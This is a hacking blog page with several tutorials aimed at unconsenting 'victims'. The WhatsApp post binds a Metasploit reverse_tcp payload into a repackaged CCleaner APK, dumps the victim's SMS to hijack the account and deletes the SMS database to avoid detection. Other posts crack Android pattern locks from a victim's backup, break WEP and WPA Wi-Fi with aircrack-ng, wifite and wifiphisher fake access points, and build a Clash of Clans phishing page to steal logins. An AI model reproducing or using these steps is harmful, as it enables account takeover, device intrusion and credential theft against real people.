UrTrick World

New post: Android, window 10 hacking. Coming soon

How to Hack whatsapp 2017 method | with proof

17 comments

Hack whatsapp account 2017 method


Note: Guys it’s not a direct a method to hack Whatsapp, or it’s not a single click hack. It may be work or not everything depends on your social skills and luck.

Whatsapp Hacking step by step Tutorial


Step 1: Firstly, you need an app so victim can download and install that without any doubt and we will bind our payload file with it. So select an app like free version of any paid app or hacked game. I am simply using ccleaner.

Step 2: Our next step will be downloading/ cloning the software is Spade. To download it, go to the terminal in your Kali and type:

 git clone https://github.com/suraj-root/spade.git


In few moments software will be installed to your kali.

Step 3: Now next step is binding the payload with this app, in my case it is ccleaner. Type following command:

./spade.py /root/Desktop/ccleaner.apk

 

Note: My app is in Desktop, if your app is in other directory, specify a path.

Step 4: After that you need specify payload, lhost, lport. For payload select option 3, i.e. reverse_tcp.
 Now lhost and lport :
LHOST: is the ip address of your machine. If you are going through LAN set your local ip, found by typing "ifconfig" in terminal.


 LPORT: the port that meterpreter will connect back to your mechine. It can be any port expects 80.

Note:If you are hacking over WAN, your LHOST is your public ip address which can be easily found through Google. Again for WAN you need port forwarding and set it as 
LPORT.
In my case:
Lhost > 192.168.0.104
Lport>4444


Step 5: After it has all been done successfully, it will ask us to set the listener. Type’y’ here now a new apk will be saved in spade folder, named originalfinal.apk



Step 6: Now finally convince victim to download and install the infected apk (originalfina.apk), as soon as victim opens the apk, you will get a session (what we needed).

Install whatsapp on your phone and put victim’s mobile number, whatsapp will try to verify number through sms.

Step 7: To get that sms, type command 
  dump_sms

a file containing that sms will be created in spade directory, containing all of the person's sms. Use this otp to start whatsapp.



Now here are some points you must remember or you can face in real life.

#1 There are 100% chances that your victim will notice that someone using his whatsapp account as he will asked to verify whatsapp whenever he try to open his whatsapp. To prevent this situation, get the MAC address of victim and spoof your MAC address. In order to spoofing your phone must be rooted. Please go through Google about spoofing MAC address.

#2 He would also able to notice sms he received from whatsapp, to solve this problem you need to delete his sms to do that type

delete data/data/com/android.provider.telephony/database/mmsms.db

But this command only works if victim’s phone is rooted.

It will work if everything goes in your favor. Of course it’s not one of the best and easiest methods. But it helpful in understanding of exploit and mixing things to perform desired attack.

Please comment for any queries.

Crack Android Pattern Lock using kali | no root required 2017

7 comments

How to crack Pattern locks without Data loss



Hi guys, from last my post we are using kali linux for hacking. Let's analyze the power of kali linux through cracking the pattern lock of android device. Although there are many methods and many tools (for various platform like window, mac or linux) are available but there basic requirements is, victim's phone must be rooted or debugging should be on. Which is not making any sense; there are rarest chances that your victims would have a rooted phone with debugging on. Another simplest method is flashing new rom, that’s mean forget the data... But luckily kali give us the power to crack pattern lock without root. I will show you two methods for cracking android screen lock.

Requirements:
Kali linux (If you don’t know how to make live usbof kali linux read it here)
Victim's android device
Memory card


Method 1: Pattern locks Cracking with Android Pattern Lock Cracker


Ok before you check and try, let's see which tool of tool box (kali linux) help us. Android pattern can be hacked with help of Android Pattern Lock Cracker, this is a little tool to crack the pattern lock on Android devices.

How does the pattern lock works?

The pattern lock is the SHA1 hash sequence of digits (0-8) with length from 3 (4 since Android 2.3.3) to 8.
Since Android does not allows the pattern to repeat "balls" and it does not use a salt when computing the SHA1 hash, it really takes a very short period of time to crack the hash and get the pattern.
The gesture board is a 3x3 matrix, and can be represented as follows (each digit represents a "ball"):

 

So if you set the pattern lock to 0 -> 1 -> 2 -> 5 -> 4, the SHA1 hash will be output of SHA1("\x00\x01\x02\x05\x04"), and that is the hash to be cracked by this tool.

Where can I find the hash or pattern lock file?

The hash (pattern lock file) is stored at "/data/system/gesture.key".

How to Hack Android Pattern in unrooted device

1. First reset Android device in Recovery Mode, if you don't know please Google it.

2. Now create backup user data from Recovery Mode. Remember a memory card is required to create a file. This backup will be stored as userdata_xxxx_xxxxxx.backup on memory card.

3. Now run you live kali linux and copy the userdata_xxxx_xxxxxx.backup from memory card to Desktop.

4. Now you have to convert and extract userdata_xxxx_xxxxxx.backup file. To do this type following commands:

cd ~/Desktop/

dd if=userdata_xxxx_xxxxxx.backup bs=512 skip=1 of=backup.tar.gz


*You may need to replace the userdata_xxxx_xxxxxx.backup with your file name.

mkdir backup


tar -xvf backup.tar.gz -C ~/Desktop/backup


5. Now you need Android Pattern Lock Cracker tool in your device, to get it, open your terminal and type:
git clone https://github.com/sch3m4/androidpatternlock
6. Now let's try to hack the pattern lock using following commands:

python ~/Desktop/androidpatternlock/aplc.py ~/Desktop/backup/system/gesture.key


If you are not comfortable with command lines, i have another method for you, with GUI.

Method 2: Pattern locks cracking with AndroidGestureCrack.

It is another tool for kali linux, but this time you don't need to face commands line work on GUI. Let's first understand how it works?
AndroidGestureCrack is a Java tool to crack the Gesture Screenlock pattern of an Android Phone. It has been tested on Android API Level 15 and up, but should work with lower versions as well. As long as you extract the gesture.key file this tool will work
The key is a SHA1 hash of the sequence of bytes for the gesture pattern. The hash is unsalted and hence is easier to crack.

First follow same 4 step as mentioned in method 1 (I am not gonna right them again).  Now you will have backup folder in your desktop. Now open follow this path "Desktop/backup/data/system/” where you can search for “gesture.key” and paste it to Desktop. You will need this gesture.key later (at step 5).

1. Run kali on your pc and change your directory to desktop by typing in terminal:

cd Desktop


*cd is use to change the directory. You can learn other commands from google.
 
  
2. Now you need to AndroidGestureCarck in your kali, type following command.

git clone https://github.com/AnimeshShaw/AndroidGestureCrack


3. Now you need to unzip the AndroidGestureCarck.zip file by following command.
unzip AndroidGestureCarck-master.zip

4. Now again change your directory to AndroidGestureCarck-master/jar as follows.
cd AndroidGestureCarck-master/jar


5. Now Download Dictionary and unzip it. You will get an AndroidGestureSHA1.txt file. Move it Desktop.

6. To crack android pattern, type in terminal:
java -jar AndroidGestureCrack-2.1-Beta.jar --gui


A GUI box should be opened. 



Now you just only need to provide the gesture.key file (at your desktop) and a dictionary text file (at your desktop). (Remember you have downloaded it in step 1).

             

Or you can also type following command instead of GUI.

java -jar AndroidGestureCrack-2.1-Beta.jar gesture.key AndroidGestureSHA1.txt


Let me know if you face any problem.

How to hack WEP secured wifi?

1 comment

Hack wifi (WEP) using kali linux 


Hi guys, in my last post i posted some detail of wifi encryption and how you can easily hack them with some simplest GUI tools. But today i will show you how you can done same thing with commands line on terminal. Believe me there are more chances of cracking wifi command lines than GUI.
Alright, i am assuming you have Kali Linux and running on your computer. If not, here is a post on hacking with kali linux.

Wifi Hacking: WEP using kali linux


To hack WEP wifi encrypted, just follow these simple steps-

1. Find out the name of your wireless adapter.

Alright, your computer has many network adapters; you need to know its name. Open a new terminal and type:
ifconfig 
and hit enter.


So there are basically the following results that you need to know-
lo - loopback.
eth - ethernet
wlan0 or wlan1
 Note down your wlan(0/1/2) adapter.

2. Enable Monitor mode

To enable monitor mode just type:
airmon-ng check kill
airmon-ng start wlan0
 

Remember in my wireless adapter is wlan0, vary with your wireless card.
Your new interface called monitoring mode will be created as mon0 in case of Kali linux version 1.0.
Note: If you are using kali 2.0 then your new interface will be wlan0mon.


3. Start capturing packets

Now, we'll use airodump-ng to capture the packets of the wifi. This tool gathers data from the wireless packets of the wifi.
Type in the terminal:

airodump-ng mon0


For kali 2.0, replace mon0 with wlan0mon.
You'll see many wifi as well as the name of the wifi you want to hack.


4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command:
airodump-ng mon0 --write name_of_file


Again for kali 2.0, replace mon0 with wlan0mon.

Now the captured packets will be stored in name_of_file.cap.  You will have to wait till you have enough data (10000 minimum)


5. Crack the wifi

When finally you've got 10000 packets (don't stop the packet capture yet). Now, you can use aircrack-ng to crack the password.
In a new terminal type:
aircrack-ng name_of_file-01.cap

The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

You'll get the key, probably in this format-
xx:xx:xx:xx:xx
Remove the colons
xxxxxxxxxx is the password of the wireless network. If you have any question, comment freely.





Hack Wifi In Kali Linux 2017 Methods

1 comment

How to hack wifi in kali linux


When it comes to hacking, wifi hacking is one of the most popular topic, because everyone wants a free internet connection.  Many Hacking tools, software and techniques have been used by many hackers that crack a high secured Wi-Fi Network.
Kali linux is one of them, many people get confused, kali linux is not a cracking software instead it is a toolbox.
Note: Kali linux is tool kit, to hack wifi you have to choose right one. If one method don't work for you try another. I will cover all available tools in my upcoming posts.
Before hacking wifi, you must be aware of encryption technique used in order to secure wifi. It’s not only for knowledge although it will help you to choose different kind of suitable attack for different kind of encrypted networks.
There are different types of Encryption from which three basic security encryption are most common.

Wi-fi security: methods of encryption

 These three methods of encryption has different types of vulnerability associated with wireless networks and can be hacked with different methods. The different types of Wireless Encryption Security techniques include the following (not deep details):

WEP: WEP is Wired Equivalent Privacy that can be cracked easily when configured appropriately. This method of encryption can be cracked within 5 minutes.

WPA: WPA is Wi-Fi Protected Access that provides strong security. Even then, there is possibility to crack if the Wi-Fi password if short. However, wireless networks can be hacked easily using various tools

WPA2: WPA2 is Wi-Fi Protected Access 2 that also eventually provides high security. You can hack this method of Wi-Fi encryption at the time of packet generation from Wi-Fi access points.


Techniques to hack wi-fi network

If you are much interested in hacking high security encryption based Wi-Fi networks, you need to arrange few things that are required at the time of Hacking process. After arranging all the essential things, you can hack a Wi-Fi network using few tools and techniques that can be seen below:

REQUIREMENTS

  • Kali Linux OS    
  • External Wi-Fi Adapter or Inbuilt Wi-Fi Device

  (Don't be confused, if your computer doesn’t have a wifi device, then you have to buy an external one).  




METHOD 1: HACK Wi-Fi Network using Wifite


Wifite is a Linux-based platform tool that is available on variant Operating Systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row that is customized to be automated with only a few arguments.
Simply type ‘wifite’ in terminal. Here, you can see List of Available Wi-Fi Access Points.
 Wait for few seconds in order to notice nearby Wi-Fi points like WEP, WPA/WPA2.


Steps to Hack WEP Encryption based Wi-Fi Network

Step 1. Just choose the appropriate target NUM (1,2,3,..) in order to crack it.  
Step 2. Make sure that the attack is completed within 10 minutes. You need not worry if one WEP WiFi attack fails, the other will come into action automatically for succeeding 10 minutes.  Within few minutes the WEP Wi-Fi network gets hacked.


Step 3. You can see the WEP key that is present in the above image. It is a Hexadecimal representation of WEP WiFi’s password. That WEP Key can be used as the Wi-Fi password. You can also convert the Wi-Fi password into actual password using online Hex-to-ASCII converter.

Steps to Hack WPA Encryption based Wi-Fi Network


Hacking a Wi-Fi network that uses WPA security encryption is little bit tough when compared to WEP as this is highly protected encryption method. It takes less time to hack a Wi-Fi network that uses short passwords.
In order to hack this type of Wi-Fi network you need to use Handshake capture and wifite will capture it. I will post another method to capture Handshake file in my post.


Handshake Capture:

Handshake is a file that can be captured when Router and client(s) communicate to authenticate each other. You may have a doubt that, “What is the purpose of this Handshake file?” The main target is to hack Wi-Fi network. This Handshake file contain Wi-Fi password but in encrypted form. To get that password we need to perform different kinds of attack on Handshake file.

 Following attack can be done on Handshake file.



Brute-Forcing: As the password is in encrypted form, let us try some other password combination on the encrypted password to acquire the original password. This process is known as Brute Forcing that is done offline. By using Brute-Forcing, the password present in the handshake file can be captured easily within few minutes.

Dictionary File:  In the below image, you can see dictionary which is a file that contains all known words from various sources usually phrased as Wi-Fi password. 


As soon as you start WPA handshake capture, it displays a message as “Client Found”.  It generates a command using handshake capture (that contains password) as (TEST_C0-A0-BB-04-5C-A9.cap). The above command cracks the password file that must be saved at /root/DICTIONARY/. Till now, you have used two WPA attacks that are completed successfully.


A password file usually contains words that are created using combination of different characters, numbers and special symbols. A password requires a lot of computational power if it a strong password including numbers and other special characters. The above WPA Wi-Fi Security Encryption got cracked easily because of easy password. Suppose, if you are but dealing with strong password, it might take more hours to crack the password.




METHOD 2:  HACK Wi-Fi Network using WIFIPHISHER




Wifiphisher is a security tool that performs one kind of phishing attacks which are against WPA networks. Unlike other methods of hacking, Wifiphisher is a type of social engineering attack that does not include brute forcing.
Wifiphisher is a tool that is used to hack a Wi-FI network and this attack makes use of three phases:

PHASE 1: Victim is being deauthenticated from their access point.


Wifiphisher tries to jam all the target access point’s wifi devices continuously that are available within range by sending deauth packets to the client from the access point.
 Then it starts generating fake access points by copying an access point from a set of access points shown below:


PHASE 2:
 This is the second phase where the Victim joins our fake access point.
It asks for password authentication.
 Wifiphisher sniffs the area and copies the target access point’s settings.
 Now, this tool creates a fake wireless access point that is modeled on the target by setting a NAT/DHCP server and forwards the right ports.
 Consequently, because of the jamming, clients will start connecting to the fake access point. After this phase, the victim is Mitimed.


PHASE 3:
Victim is being served a realistic router config-looking page where the Wifiphisher tool employs a minimal web server that responds to HTTP & HTTPS requests.
    As soon as the victim requests a page from the Internet, wifiphisher responds with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.






Step by step hacking tutorials are coming… 

Hack clash of clans via wapka phishing

6 comments

How to make clash of clans phishing site

clash of clans phishing site

Hi guys, hacker not only enjoy breaking systems, sometime hacker also enjoy game, ah correct me hacker also enjoy hacking a game. What if you can get other gamer's score, more clearly if you can have other player's coc village. Yes it is possible with the help of phishing. Today i am gonna show you how to make phishing of coc in wapka.
Sometime hacking is phishing people in your net, with your skills.
 I am assuming you already know various kind of phishingpopular on internet like facebook phishing, gmail phishing blah blah...
Let's continuous this series of phishing, since it is very easy even a small kid can perform such phishing attack with his mobile. All tedious part on such phishing is convincing victim to signup, which can be easily done by social engineering. The only disadvantage of phishing is very people know such kind of scam so not everyone will trap in your net. But never underestimate the phishing, if it is used with some skills. Anyway i leave all this part on you, and show you how to make phishing page of coc? For simplicity i am using wapka, there other method to make phishing.

Note: It is almost impossible to hack/crack coc. There is no online site which can hack coc and provide your thousands of gems for free. All sites about coc hacking are fake. Never believe on such sites. Yes, xmod and private server may help you a bit.

Clash of Clans phishing tutorial




Step 1: Of course you need a wapka account, so register a new Wapka account or login with your existing account.

Step 2: Now create a new site, it is recommended don't use any existing site, because existing phishing link won't let victim to believe in your site. So create a new site with tempting url, such clash of clan hacking....

Then click on Manage.

Step 3: Now you have 2 modes available (admin mode and user mode), Click on Admin mode.

Step 4: As you click on Admin mode you redirects to a Blank page. It’s blank because till now you did nothing with your newly created site. You need to add codes in your site.

At the Lower right most corner you have a link ::EDIT SITE(#):: click on it.

clash of clans phishing code

Step 5: Now click on (WML/XHTML code).

clash of clans phishing code

Step 6:  Copy all the coc phishing code and paste it into (WML/XHTML code) box and click on Submit button.

clash of clans phishing code

Coc phishing script:





Step 7: It’s all over now send your site link which was created at Step 2 to your victim. Since most never believe on those sites which are ending at .wapka. So you need to short this link and send shorted link to your victim.



As your victim login to your page his/her E-mail and Password sends to your E-mail by which you have created your account at wapka at first step. Now you’ve your victim's email and his village ha ha ha..